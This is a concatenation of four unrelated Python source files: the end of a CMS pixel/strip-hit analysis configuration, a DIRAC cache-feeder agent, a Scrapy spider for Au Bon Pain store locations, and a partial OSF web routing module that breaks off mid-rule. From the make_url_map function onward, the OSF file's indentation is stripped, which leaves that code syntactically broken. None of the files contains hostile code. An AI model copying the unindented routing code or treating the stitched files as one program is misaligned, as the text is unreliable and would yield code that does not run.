        connect = cms.untracked.string("frontier://FrontierProd/CMS_COND_31X_PHYSICSTOOLS"),
        label = cms.untracked.string("HFtowersHydjetDrum5")
    ),
])
# Pixel-hit ntuplizer; tracking info disabled, centrality stored.
process.ana = cms.EDAnalyzer('PixelHitAnalyzer',
    vertexSrc = cms.vstring('pixelVertexFromClusters'),
    trackSrc = cms.untracked.InputTag('generalTracks'),
    doTracking = cms.untracked.bool(False),
    doCentrality = cms.untracked.bool(True)
)
# Strip-hit ntuplizer over the matched rechit collection.
process.anaStrip = cms.EDAnalyzer('StripHitAnalyzer',
    vertexSrc = cms.vstring('pixelVertexFromClusters'),
    trackSrc = cms.untracked.InputTag('generalTracks'),
    doTracking = cms.untracked.bool(False),
    doCentrality = cms.untracked.bool(True),
    RecHitCollections = cms.VInputTag(
#        cms.InputTag('siStripMatchedRecHits','rphiRecHit'),
        cms.InputTag('siStripMatchedRecHits','matchedRecHit')
    )
)
#process.SiStripRecHitsAnalyzer = cms.EDAnalyzer('SiStripRecHitsAnalyzer',
#    RecHitCollections = cms.VInputTag( cms.InputTag('siStripMatchedRecHits','rphiRecHit'),
#                                       cms.InputTag('siStripMatchedRecHits','stereoRecHit')
#    )
#)
#process.load("HeavyIonsAnalysis.EventAnalysis.hievtanalyzer_mc_cfi")
# HLT trigger-bit analyzer writing into the same TFileService output.
process.load("HLTrigger.HLTanalyzers.HLTBitAnalyser_cfi")
process.hltbitanalysis.UseTFileService = cms.untracked.bool(True)
process.hltanalysis = process.hltbitanalysis.clone(
    l1GtReadoutRecord = cms.InputTag("gtDigis"),
    l1GctHFBitCounts = cms.InputTag("gctDigis"),
    l1GctHFRingSums = cms.InputTag("gctDigis"),
    l1extramu = cms.string('l1extraParticles'),
    l1extramc = cms.string('l1extraParticles'),
    hltresults = cms.InputTag("TriggerResults","","HLT"),
)
process.TFileService = cms.Service('TFileService',
    fileName = cms.string('PixelTree-EPOS.root')
)
# Full path: rebuild rechits, vertex, centrality, trigger bits, ntuples.
process.analyze = cms.Path(
    process.siPixelRecHits*
    process.siStripMatchedRecHits*
    process.pixelVertexFromClusters*
#    process.hiSelectedVertex*
    process.pACentrality*
    process.centralityBin*
    process.hltanalysis*
#    process.hiEvtAnalyzer*
    process.ana*
    process.anaStrip
#    process.SiStripRecHitsAnalyzer
)
|
# $HeadURL: $
''' CacheFeederAgent
This agent feeds the Cache tables with the outputs of the cache commands.
'''
from DIRAC import S_OK#, S_ERROR, gConfig
from DIRAC.AccountingSystem.Client.ReportsClient import ReportsClient
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.Core.DISET.RPCClient import RPCClient
from DIRAC.Core.LCG.GOCDBClient import GOCDBClient
from DIRAC.ResourceStatusSystem.Client.ResourceStatusClient import ResourceStatusClient
from DIRAC.ResourceStatusSystem.Command import CommandCaller
#from DIRAC.ResourceStatusSystem.Utilities import CSHelpers
from DIRAC.ResourceStatusSystem.Utilities import Utils
ResourceManagementClient = getattr(Utils.voimport( 'DIRAC.ResourceStatusSystem.Client.ResourceManagementClient' ),'ResourceManagementClient')
__RCSID__ = '$Id: $'
AGENT_NAME = 'ResourceStatus/CacheFeederAgent'
class CacheFeederAgent( AgentModule ):
  '''
  The CacheFeederAgent feeds the cache tables for the client and the accounting.
  It runs periodically a set of commands, and stores their results on the
  tables.
  '''
  # Too many public methods
  # pylint: disable-msg=R0904
  def __init__( self, *args, **kwargs ):
    # Containers are declared here and populated in initialize().
    AgentModule.__init__( self, *args, **kwargs )
    # Mapping: command module name -> list of { commandName : argsDict }
    self.commands = {}
    # Shared client instances, passed to every command invocation.
    self.clients = {}
    self.cCaller = None
    self.rmClient = None
  def initialize( self ):
    '''Declare the commands to run and the clients they reuse.'''
    self.am_setOption( 'shifterProxy', 'DataManager' )
    self.rmClient = ResourceManagementClient()
    # Active command set; the commented blocks below are kept as a record
    # of commands that can be re-enabled.
    self.commands[ 'Downtime' ] = [ { 'Downtime' : {} } ]
    self.commands[ 'SpaceTokenOccupancy' ] = [ { 'SpaceTokenOccupancy' : {} } ]
    #PilotsCommand
#    self.commands[ 'Pilots' ] = [
#                                 { 'PilotsWMS' : { 'element' : 'Site', 'siteName' : None } },
#                                 { 'PilotsWMS' : { 'element' : 'Resource', 'siteName' : None } }
#                                 ]
    #FIXME: do not forget about hourly vs Always ...etc
    #AccountingCacheCommand
#    self.commands[ 'AccountingCache' ] = [
#                                          {'SuccessfullJobsBySiteSplitted'    :{'hours' :24, 'plotType' :'Job' }},
#                                          {'FailedJobsBySiteSplitted'         :{'hours' :24, 'plotType' :'Job' }},
#                                          {'SuccessfullPilotsBySiteSplitted'  :{'hours' :24, 'plotType' :'Pilot' }},
#                                          {'FailedPilotsBySiteSplitted'       :{'hours' :24, 'plotType' :'Pilot' }},
#                                          {'SuccessfullPilotsByCESplitted'    :{'hours' :24, 'plotType' :'Pilot' }},
#                                          {'FailedPilotsByCESplitted'         :{'hours' :24, 'plotType' :'Pilot' }},
#                                          {'RunningJobsBySiteSplitted'        :{'hours' :24, 'plotType' :'Job' }},
##                                          {'RunningJobsBySiteSplitted'        :{'hours' :168, 'plotType' :'Job' }},
##                                          {'RunningJobsBySiteSplitted'        :{'hours' :720, 'plotType' :'Job' }},
##                                          {'RunningJobsBySiteSplitted'        :{'hours' :8760, 'plotType' :'Job' }},
#                                          ]
    #VOBOXAvailability
#    self.commands[ 'VOBOXAvailability' ] = [
#                                            { 'VOBOXAvailability' : {} }
#
    #Reuse clients for the commands
    self.clients[ 'GOCDBClient' ] = GOCDBClient()
    self.clients[ 'ReportGenerator' ] = RPCClient( 'Accounting/ReportGenerator' )
    self.clients[ 'ReportsClient' ] = ReportsClient()
    self.clients[ 'ResourceStatusClient' ] = ResourceStatusClient()
    self.clients[ 'ResourceManagementClient' ] = ResourceManagementClient()
    self.clients[ 'WMSAdministrator' ] = RPCClient( 'WorkloadManagement/WMSAdministrator' )
    self.cCaller = CommandCaller
    return S_OK()
  def loadCommand( self, commandModule, commandDict ):
    '''Instantiate one command object from a { name : args } dict.
    Returns S_OK( commandObject ) or the S_ERROR from the invocation.
    '''
    commandName = commandDict.keys()[ 0 ]
    commandArgs = commandDict[ commandName ]
    commandTuple = ( '%sCommand' % commandModule, '%sCommand' % commandName )
    commandObject = self.cCaller.commandInvocation( commandTuple, pArgs = commandArgs,
                                                    clients = self.clients )
    if not commandObject[ 'OK' ]:
      self.log.error( 'Error initializing %s' % commandName )
      return commandObject
    commandObject = commandObject[ 'Value' ]
    # Set master mode
    commandObject.masterMode = True
    self.log.info( '%s/%s' % ( commandModule, commandName ) )
    return S_OK( commandObject )
  def execute( self ):
    '''Run every configured command once; failures are logged and skipped
    so one broken command does not stop the rest of the cycle.
    '''
    for commandModule, commandList in self.commands.items():
      self.log.info( '%s module initialization' % commandModule )
      for commandDict in commandList:
        commandObject = self.loadCommand( commandModule, commandDict )
        if not commandObject[ 'OK' ]:
          self.log.error( commandObject[ 'Message' ] )
          continue
        commandObject = commandObject[ 'Value' ]
        # doCommand() is expected to store its own results in the cache
        # tables; only the status is inspected here.
        results = commandObject.doCommand()
        if not results[ 'OK' ]:
          self.log.error( results[ 'Message' ] )
          continue
        results = results[ 'Value' ]
        if not results:
          self.log.info( 'Empty results' )
          continue
        self.log.verbose( 'Command OK Results' )
        self.log.verbose( results )
    return S_OK()
################################################################################
#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
|
import scrapy
import re
import json
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
class AuBonPainSpider(scrapy.Spider):
    """Scrape every Au Bon Pain store page into a GeojsonPointItem."""
    name = "aubonpain"
    download_delay = 0.5
    allowed_domains = [
        "www.aubonpain.com",
    ]
    start_urls = (
        'https://www.aubonpain.com/stores/all-stores',
    )
    def parse_hours(self, items):
        """Build an opening-hours string from the site's per-day hour dicts.
        ``items`` is the decoded ``hours`` JS variable: a list of dicts with
        'Day', 'Open' and 'Close' keys -- TODO confirm against a live page.
        """
        opening_hours = OpeningHours()
        for day in items:
            open_time = day["Open"]
            close_time = day["Close"]
            if close_time == 'Closed' or open_time == 'Closed':
                continue
            elif close_time == 'Open 24 Hrs' or open_time == 'Open 24 Hrs':
                # Round-the-clock opening is encoded midnight-to-midnight.
                open_time = '12:00 AM'
                close_time = '12:00 AM'
            elif close_time == 'Open for Special Events':
                # NOTE(review): only the Close field is checked here; the
                # same value in day["Open"] would reach strptime below and
                # raise -- confirm it cannot occur in practice.
                continue
            opening_hours.add_range(day=day["Day"][:2],
                                    open_time=open_time,
                                    close_time=close_time,
                                    time_format='%I:%M %p')
        return opening_hours.as_opening_hours()
    def parse_store(self, response):
        """Extract one store's location, address, phone and hours."""
        # The URL's trailing slug doubles as the item's stable ref.
        ref = re.findall(r"[^(\/)]+$", response.url)[0]
        scripts = "".join(response.xpath('//script/text()').extract())
        # Coordinates only appear inside the Bing Maps setup script.
        lat, lon = re.search(r'.*Microsoft.Maps.Location\(([0-9.-]*),\s+([0-9-.]*)\).*', scripts).groups()
        # Two <dd> lines: street address, then "City, ST 12345".
        address1, address2 = response.xpath('//dt[contains(text(), "Address")]/following-sibling::dd/text()').extract()
        city, state, zipcode = re.search(r'^(.*),\s+([a-z]{2})\s+([0-9]+)$', address2.strip(), re.IGNORECASE).groups()
        properties = {
            'addr_full': address1.strip(', '),
            'phone': response.xpath('//dt[contains(text(), "Phone")]/following-sibling::dd/a/text()').extract_first(),
            'city': city,
            'state': state,
            'postcode': zipcode,
            'ref': ref,
            'website': response.url,
            'lat': float(lat),
            'lon': float(lon),
        }
        # The hours table is embedded as a JS variable, not in the DOM.
        hours = json.loads(re.search(r'.*var\shours\s*=\s*(.*?);.*', scripts).groups()[0])
        hours = self.parse_hours(hours)
        if hours:
            properties['opening_hours'] = hours
        yield GeojsonPointItem(**properties)
    def parse(self, response):
        """Follow every store link from the all-stores index page."""
        urls = response.xpath('//section/div/div//a[contains(@href, "stores")]/@href').extract()
        for url in urls:
            # Some hrefs contain literal CRLF sequences; strip them.
            url = url.replace('\r\n', '')
            yield scrapy.Request(response.urljoin(url), callback=self.parse_store)
|
# -*- coding: utf-8 -*-
import os
import httplib as http
from flask import request
from flask import send_from_directory
from framework import status
from framework import sentry
from framework.auth import cas
from framework.routing import Rule
from framework.flask import redirect
from framework.routing import WebRenderer
from framework.exceptions import HTTPError
from framework.auth import get_display_name
from framework.routing import xml_renderer
from framework.routing import json_renderer
from framework.routing import process_rules
from framework.auth import views as auth_views
from framework.routing import render_mako_string
from framework.auth.core import _get_current_user
from modularodm import Q
from modularodm.exceptions import QueryException, NoResultsFound
from website import util
from website import prereg
from website import settings
from website import language
from website.util import metrics
from website.util import paths
from website.util import sanitize
from website import maintenance
from website.models import Institution
from website import landing_pages as landing_page_views
from website import views as website_views
from website.citations import views as citation_views
from website.search import views as search_views
from website.oauth import views as oauth_views
from website.profile import views as profile_views
from website.project import views as project_views
from website.addons.base import views as addon_views
from website.discovery import views as discovery_views
from website.conferences import views as conference_views
from website.preprints import views as preprint_views
from website.institutions import views as institution_views
from website.notifications import views as notification_views
def get_globals():
    """Context variables that are available for every template rendered by
    OSFWebRenderer.

    Most entries degrade gracefully to '' / [] / None when no user is
    logged in.
    """
    user = _get_current_user()
    # Institutions are trimmed to the three fields the templates use.
    user_institutions = [{'id': inst._id, 'name': inst.name, 'logo_path': inst.logo_path} for inst in user.affiliated_institutions] if user else []
    all_institutions = [{'id': inst._id, 'name': inst.name, 'logo_path': inst.logo_path} for inst in Institution.find().sort('name')]
    if request.host_url != settings.DOMAIN:
        # Request arrived on a non-canonical host (e.g. an institution
        # domain): log in via the canonical OSF domain, landing on the
        # institution page when the host maps to a known institution.
        try:
            inst_id = (Institution.find_one(Q('domains', 'eq', request.host.lower())))._id
            request_login_url = '{}institutions/{}'.format(settings.DOMAIN, inst_id)
        except NoResultsFound:
            request_login_url = request.url.replace(request.host_url, settings.DOMAIN)
    else:
        request_login_url = request.url
    return {
        'private_link_anonymous': is_private_link_anonymous_view(),
        'user_name': user.username if user else '',
        'user_full_name': user.fullname if user else '',
        'user_id': user._primary_key if user else '',
        'user_locale': user.locale if user and user.locale else '',
        'user_timezone': user.timezone if user and user.timezone else '',
        'user_url': user.url if user else '',
        'user_gravatar': profile_views.current_user_gravatar(size=25)['gravatar_url'] if user else '',
        'user_email_verifications': user.unconfirmed_email_info if user else [],
        'user_api_url': user.api_url if user else '',
        'user_entry_point': metrics.get_entry_point(user) if user else '',
        'user_institutions': user_institutions if user else None,
        'all_institutions': all_institutions,
        'display_name': get_display_name(user.fullname) if user else '',
        'use_cdn': settings.USE_CDN_FOR_CLIENT_LIBS,
        'piwik_host': settings.PIWIK_HOST,
        'piwik_site_id': settings.PIWIK_SITE_ID,
        # Only expose the Sentry DSN when error reporting is active.
        'sentry_dsn_js': settings.SENTRY_DSN_JS if sentry.enabled else None,
        'dev_mode': settings.DEV_MODE,
        'allow_login': settings.ALLOW_LOGIN,
        'cookie_name': settings.COOKIE_NAME,
        # pop_status_messages: flash messages are consumed here, once.
        'status': status.pop_status_messages(),
        'domain': settings.DOMAIN,
        'api_domain': settings.API_DOMAIN,
        'disk_saving_mode': settings.DISK_SAVING_MODE,
        'language': language,
        'noteworthy_links_node': settings.NEW_AND_NOTEWORTHY_LINKS_NODE,
        'popular_links_node': settings.POPULAR_LINKS_NODE,
        'web_url_for': util.web_url_for,
        'api_url_for': util.api_url_for,
        'api_v2_url': util.api_v2_url,  # URL function for templates
        'api_v2_base': util.api_v2_url(''),  # Base url used by JS api helper
        'sanitize': sanitize,
        'sjson': lambda s: sanitize.safe_json(s),
        'webpack_asset': paths.webpack_asset,
        'waterbutler_url': settings.WATERBUTLER_URL,
        'login_url': cas.get_login_url(request_login_url),
        'reauth_url': util.web_url_for('auth_logout', redirect_url=request.url, reauth=True),
        'profile_url': cas.get_profile_url(),
        'enable_institutions': settings.ENABLE_INSTITUTIONS,
        'keen_project_id': settings.KEEN_PROJECT_ID,
        'keen_write_key': settings.KEEN_WRITE_KEY,
        'maintenance': maintenance.get_maintenance(),
    }
def is_private_link_anonymous_view():
    """Return True when the current request's view-only link is anonymous."""
    # Imported here to avoid a circular import at module load time.
    from website.project.model import PrivateLink
    try:
        link = PrivateLink.find_one(
            Q('key', 'eq', request.args.get('view_only'))
        )
    except QueryException:
        # No such key (or no view_only arg at all): not an anonymous view.
        return False
    return link.anonymous
class OsfWebRenderer(WebRenderer):
    """Render a Mako template with OSF context vars.
    :param trust: Optional. If ``False``, markup-safe escaping will be enabled
    """
    def __init__(self, *args, **kwargs):
        # Every OSF page shares the template context built by get_globals.
        kwargs.update(data=get_globals)
        super(OsfWebRenderer, self).__init__(*args, **kwargs)
#: Use if a view only redirects or raises error
notemplate = OsfWebRenderer('', renderer=render_mako_string, trust=False)
# Static files (robots.txt, etc.)
def favicon():
    """Serve the site's favicon from the static folder."""
    return send_from_directory(
        settings.STATIC_FOLDER, 'favicon.ico',
        mimetype='image/vnd.microsoft.icon',
    )
def robots():
    """Serves the robots.txt file."""
    # A deployment-local override takes precedence when present.
    robots_file = 'robots.txt'
    local_path = os.path.join(settings.STATIC_FOLDER, 'robots.local.txt')
    if os.path.exists(local_path):
        robots_file = 'robots.local.txt'
    return send_from_directory(
        settings.STATIC_FOLDER,
        robots_file,
        mimetype='text/plain',
    )
def goodbye():
    """Show the logged-out message, or bounce logged-in users to the index."""
    user = _get_current_user()
    if user:
        # Still authenticated: nothing to say goodbye to.
        return redirect(util.web_url_for('index'))
    status.push_status_message(language.LOGOUT, kind='success', trust=False)
    return {}
def make_url_map(app):
"""Set up all the routes for the OSF app.
:param app: A Flask/Werkzeug app to bind the rules to.
"""
# Set default views to 404, using URL-appropriate renderers
process_rules(app, [
Rule(
'/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
OsfWebRenderer('', render_mako_string, trust=False)
),
Rule(
'/api/v1/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
json_renderer
),
])
### GUID ###
process_rules(app, [
Rule(
[
'/<guid>/',
'/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
notemplate,
),
Rule(
[
'/api/v1/<guid>/',
'/api/v1/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
json_renderer,
),
])
# Static files
process_rules(app, [
Rule('/favicon.ico', 'get', favicon, json_renderer),
Rule('/robots.txt', 'get', robots, json_renderer),
])
### Base ###
process_rules(app, [
Rule(
'/dashboard/',
'get',
website_views.dashboard,
OsfWebRenderer('home.mako', trust=False)
),
Rule(
'/myprojects/',
'get',
website_views.my_projects,
OsfWebRenderer('my_projects.mako', trust=False)
),
Rule(
'/reproducibility/',
'get',
website_views.reproducibility,
notemplate
),
Rule('/about/', 'get', website_views.redirect_about, notemplate),
Rule('/help/', 'get', website_views.redirect_help, notemplate),
Rule('/faq/', 'get', {}, OsfWebRenderer('public/pages/faq.mako', trust=False)),
Rule(['/getting-started/', '/getting-started/email/', '/howosfworks/'], 'get', website_views.redirect_getting_started, notemplate),
Rule('/support/', 'get', {}, OsfWebRenderer('public/pages/support.mako', trust=False)),
Rule(
'/explore/',
'get',
{},
OsfWebRenderer('public/explore.mako', trust=False)
),
Rule(
[
'/messages/',
],
'get',
{},
OsfWebRenderer('public/comingsoon.mako', trust=False)
),
Rule(
'/view/<meeting>/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting.mako', trust=False),
),
Rule(
'/view/<meeting>/plain/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting_plain.mako', trust=False),
endpoint_suffix='__plain',
),
Rule(
'/api/v1/view/<meeting>/',
'get',
conference_views.conference_data,
json_renderer,
),
Rule(
'/meetings/',
'get',
conference_views.conference_view,
OsfWebRenderer('public/pages/meeting_landing.mako', trust=False),
),
Rule(
'/api/v1/meetings/submissions/',
'get',
conference_views.conference_submissions,
json_renderer,
),
Rule(
'/presentations/',
'get',
conference_views.redirect_to_meetings,
json_renderer,
),
Rule(
'/news/',
'get',
website_views.redirect_to_cos_news,
notemplate
),
Rule(
'/prereg/',
'get',
prereg.prereg_landing_page,
OsfWebRenderer('prereg_landing_page.mako', trust=False)
),
Rule(
'/preprints/',
'get',
preprint_views.preprint_landing_page,
OsfWebRenderer('public/pages/preprint_landing.mako', trust=False),
),
Rule(
'/preprint/',
'get',
preprint_views.preprint_redirect,
notemplate,
),
Rule(
'/api/v1/prereg/draft_registrations/',
'get',
prereg.prereg_draft_registrations,
json_renderer,
),
])
# Site-wide API routes
process_rules(app, [
Rule(
'/citations/styles/',
'get',
citation_views.list_citation_styles,
json_renderer,
),
], prefix='/api/v1')
process_rules(app, [
Rule(
[
'/project/<pid>/<addon>/settings/disable/',
'/project/<pid>/node/<nid>/<addon>/settings/disable/',
],
'post',
addon_views.disable_addon,
json_renderer,
),
Rule(
'/profile/<uid>/<addon>/settings/',
'get',
addon_views.get_addon_user_config,
json_renderer,
),
], prefix='/api/v1')
# OAuth
process_rules(app, [
Rule(
'/oauth/connect/<service_name>/',
'get',
oauth_views.oauth_connect,
json_renderer,
),
Rule(
'/oauth/callback/<service_name>/',
'get',
oauth_views.oauth_callback,
OsfWebRenderer('util/oauth_complete.mako', trust=False),
),
])
process_rules(app, [
Rule(
[
'/oauth/accounts/<external_account_id>/',
],
'delete',
oauth_views.oauth_disconnect,
json_renderer,
)
], prefix='/api/v1')
process_rules(app, [
Rule('/confirmed_emails/', 'put', auth_views.unconfirmed_email_add, json_renderer),
Rule('/confirmed_emails/', 'delete', auth_views.unconfirmed_email_remove, json_renderer)
], prefix='/api/v1')
### Metadata ###
process_rules(app, [
Rule(
[
'/project/<pid>/comments/timestamps/',
'/project/<pid>/node/<nid>/comments/timestamps/',
],
'put',
project_views.comment.update_comments_timestamp,
json_renderer,
),
Rule(
[
'/project/<pid>/citation/',
'/project/<pid>/node/<nid>/citation/',
],
'get',
citation_views.node_citation,
json_renderer,
),
], prefix='/api/v1')
### Forms ###
process_rules(app, [
Rule('/forms/signin/', 'get', website_views.signin_form, json_renderer),
Rule('/forms/forgot_password/', 'get', website_views.forgot_password_form, json_renderer),
Rule('/forms/reset_password/', 'get', website_views.reset_password_form, json_renderer),
], prefix='/api/v1')
### Discovery ###
process_rules(app, [
Rule(
'/explore/activity/',
'get',
discovery_views.activity,
OsfWebRenderer('public/pages/active_nodes.mako', trust=False)
),
])
### Auth ###
process_rules(app, [
# confirm email
Rule(
'/confirm/<uid>/<token>/',
'get',
auth_views.confirm_email_get,
notemplate
),
# reset password get
Rule(
'/resetpassword/<verification_key>/',
'get',
auth_views.reset_password_get,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# reset password post
Rule(
'/resetpassword/<verification_key>/',
'post',
auth_views.reset_password_post,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# resend confirmation get
Rule(
'/resend/',
'get',
auth_views.resend_confirmation_get,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# resend confirmation post
Rule(
'/resend/',
'post',
auth_views.resend_confirmation_post,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# user sign up page
Rule(
'/register/',
'get',
auth_views.auth_register,
OsfWebRenderer('public/login.mako', trust=False)
),
# create user account via api
Rule(
'/api/v1/register/',
'post',
auth_views.register_user,
json_renderer
),
# osf login and campaign login
Rule(
[
'/login/',
'/account/'
],
'get',
auth_views.auth_login,
OsfWebRenderer('public/login.mako', trust=False)
),
# osf logout and cas logout
Rule(
'/logout/',
'get',
auth_views.auth_logout,
notemplate
),
# forgot password get
Rule(
'/forgotpassword/',
'get',
auth_views.forgot_password_get,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
# forgot password post
Rule(
'/forgotpassword/',
'post',
auth_views.forgot_password_post,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
Rule(
'/login/connected_tools/',
'get',
landing_page_views.connected_tools,
notemplate
),
Rule(
'/login/enriched_profile/',
'get',
landing_page_views.enriched_profile,
notemplate
),
])
### Profile ###
# Web
process_rules(app, [
Rule(
'/profile/',
'get',
profile_views.profile_view,
OsfWebRenderer('profile.mako', trust=False)
),
Rule(
'/profile/<uid>/',
'get',
profile_views.profile_view_id,
OsfWebRenderer('profile.mako', trust=False)
),
# Route for claiming and setting email and password.
# Verification token must be querystring argument
Rule(
['/user/<uid>/<pid>/claim/'],
['get', 'post'],
project_views.contributor.claim_user_form,
OsfWebRenderer('claim_account.mako', trust=False)
),
Rule(
['/user/<uid>/<pid>/claim/verify/<token>/'],
['get', 'post'],
project_views.contributor.claim_user_registered,
OsfWebRenderer('claim_account_registered.mako', trust=False)
),
Rule(
'/settings/',
'get',
profile_views.user_profile,
OsfWebRenderer('profile/settings.mako', trust=False),
),
Rule(
'/settings/account/',
'get',
profile_views.user_account,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/account/password',
'post',
profile_views.user_account_password,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/addons/',
'get',
profile_views.user_addons,
OsfWebRenderer('profile/addons.mako', trust=False),
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
OsfWebRenderer('profile/notifications.mako', trust=False),
),
Rule(
'/settings/applications/',
'get',
profile_views.oauth_application_list,
OsfWebRenderer('profile/oauth_app_list.mako', trust=False)
),
Rule(
'/settings/applications/create/',
'get',
profile_views.oauth_application_register,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/applications/<client_id>/',
'get',
profile_views.oauth_application_detail,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/tokens/',
'get',
profile_views.personal_access_token_list,
OsfWebRenderer('profile/personal_tokens_list.mako', trust=False)
),
Rule(
'/settings/tokens/create/',
'get',
profile_views.personal_access_token_register,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
Rule(
'/settings/tokens/<_id>/',
'get',
profile_views.personal_access_token_detail,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
# TODO: Uncomment once outstanding issues with this feature are addressed
# Rule(
# '/@<twitter_handle>/',
# 'get',
# profile_views.redirect_to_twitter,
# OsfWebRenderer('error.mako', render_mako_string, trust=False)
# ),
])
# API
process_rules(app, [
Rule('/profile/', 'get', profile_views.profile_view, json_renderer),
Rule('/profile/', 'put', profile_views.update_user, json_renderer),
Rule('/resend/', 'put', profile_views.resend_confirmation, json_renderer),
Rule('/profile/<uid>/', 'get', profile_views.profile_view_id, json_renderer),
# Used by profile.html
Rule('/profile/<uid>/edit/', 'post', profile_views.edit_profile, json_renderer),
Rule('/profile/<uid>/public_projects/', 'get',
profile_views.get_public_projects, json_renderer),
Rule('/profile/<uid>/public_components/', 'get',
profile_views.get_public_components, json_renderer),
Rule('/profile/<user_id>/summary/', 'get',
profile_views.get_profile_summary, json_renderer),
Rule('/user/<uid>/<pid>/claim/email/', 'post',
project_views.contributor.claim_user_post, json_renderer),
Rule(
'/profile/export/',
'post',
profile_views.request_export,
json_renderer,
),
Rule(
'/profile/deactivate/',
'post',
profile_views.request_deactivation,
json_renderer,
),
Rule(
[
'/profile/gravatar/',
'/users/gravatar/',
'/profile/gravatar/<size>',
'/users/gravatar/<size>',
],
'get',
profile_views.current_user_gravatar,
json_renderer,
),
Rule(
[
'/profile/<uid>/gravatar/',
'/users/<uid>/gravatar/',
'/profile/<uid>/gravatar/<size>',
'/users/<uid>/gravatar/<size>',
],
'get',
profile_views.get_gravatar,
json_renderer,
),
# Rules for user profile configuration
Rule('/settings/names/', 'get', profile_views.serialize_names, json_renderer),
Rule('/settings/names/', 'put', profile_views.unserialize_names, json_renderer),
Rule('/settings/names/impute/', 'get', profile_views.impute_names, json_renderer),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'get',
profile_views.serialize_social,
json_renderer,
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'get',
profile_views.serialize_jobs,
json_renderer,
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'get',
profile_views.serialize_schools,
json_renderer,
),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'put',
profile_views.unserialize_social,
json_renderer
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'put',
profile_views.unserialize_jobs,
json_renderer
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'put',
profile_views.unserialize_schools,
json_renderer
),
], prefix='/api/v1',)
### Search ###
# Web
process_rules(app, [
Rule(
'/search/',
'get',
{},
OsfWebRenderer('search.mako', trust=False)
),
Rule(
'/share/',
'get',
{},
OsfWebRenderer('share_search.mako', trust=False)
),
Rule(
'/share/registration/',
'get',
{'register': settings.SHARE_REGISTRATION_URL},
OsfWebRenderer('share_registration.mako', trust=False)
),
Rule(
'/share/help/',
'get',
{'help': settings.SHARE_API_DOCS_URL},
OsfWebRenderer('share_api_docs.mako', trust=False)
),
Rule( # FIXME: Dead route; possible that template never existed; confirm deletion candidate with ErinB
'/share_dashboard/',
'get',
{},
OsfWebRenderer('share_dashboard.mako', trust=False)
),
Rule(
'/share/atom/',
'get',
search_views.search_share_atom,
xml_renderer
),
Rule('/api/v1/user/search/', 'get', search_views.search_contributor, json_renderer),
Rule(
'/api/v1/search/node/',
'post',
project_views.node.search_node,
json_renderer,
),
])
# API
process_rules(app, [
Rule(['/search/', '/search/<type>/'], ['get', 'post'], search_views.search_search, json_renderer),
Rule('/search/projects/', 'get', search_views.search_projects_by_title, json_renderer),
Rule('/share/search/', ['get', 'post'], search_views.search_share, json_renderer),
Rule('/share/stats/', 'get', search_views.search_share_stats, json_renderer),
Rule('/share/providers/', 'get', search_views.search_share_providers, json_renderer),
], prefix='/api/v1')
# Institution
process_rules(app, [
Rule('/institutions/<inst_id>/', 'get', institution_views.view_institution, OsfWebRenderer('institution.mako', trust=False))
])
# Project
# Web
process_rules(app, [
# '/' route loads home.mako if logged in, otherwise loads landing.mako
Rule('/', 'get', website_views.index, OsfWebRenderer('index.mako', trust=False)),
Rule('/goodbye/', 'get', goodbye, OsfWebRenderer('landing.mako', trust=False)),
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'get',
project_views.node.view_project,
OsfWebRenderer('project/project.mako', trust=False)
),
# Create a new subproject/component
Rule(
'/project/<pid>/newnode/',
'post',
project_views.node.project_new_node,
notemplate
),
# # TODO: Add API endpoint for tags
# Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, OsfWebRenderer('tags.mako', trust=False)),
Rule('/project/new/<pid>/beforeTemplate/', 'get',
project_views.node.project_before_template, json_renderer),
Rule(
[
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
],
'get',
project_views.node.node_contributors,
OsfWebRenderer('project/contributors.mako', trust=False),
),
Rule(
[
'/project/<pid>/settings/',
'/project/<pid>/node/<nid>/settings/',
],
'get',
project_views.node.node_setting,
OsfWebRenderer('project/settings.mako', trust=False)
),
# Permissions
Rule( # TODO: Where, if anywhere, is this route used?
[
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
],
'post',
project_views.node.project_set_privacy,
OsfWebRenderer('project/project.mako', trust=False)
),
### Logs ###
# View forks
Rule(
[
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
],
'get',
project_views.node.node_forks,
OsfWebRenderer('project/forks.mako', trust=False)
),
# Registrations
Rule(
[
'/project/<pid>/register/',
'/project/<pid>/node/<nid>/register/',
],
'get',
